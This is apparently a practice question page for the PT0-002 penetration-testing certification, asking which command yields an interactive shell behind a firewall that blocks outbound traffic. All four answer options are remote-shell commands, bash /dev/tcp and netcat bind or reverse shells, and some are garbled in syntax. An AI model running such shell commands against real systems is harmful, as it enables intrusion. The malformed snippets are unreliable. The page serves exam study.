List of questions
Related questions
Question 421 - PT0-002 discussion
After compromising a remote host, a penetration tester is able to obtain a web shell. A firewall is blocking outbound traffic. Which of the following commands would allow the penetration tester to obtain an interactive shell on the remote host?
A.
bash -i >& /dev/tcp 8443 0>&l
B.
nc -e host 8443 /bin/bash
C.
nc -vlp 8443 /bin/bash
D.
nc -vp 8443 /bin/bash
Your answer:
0 comments
Sorted by
Leave a comment first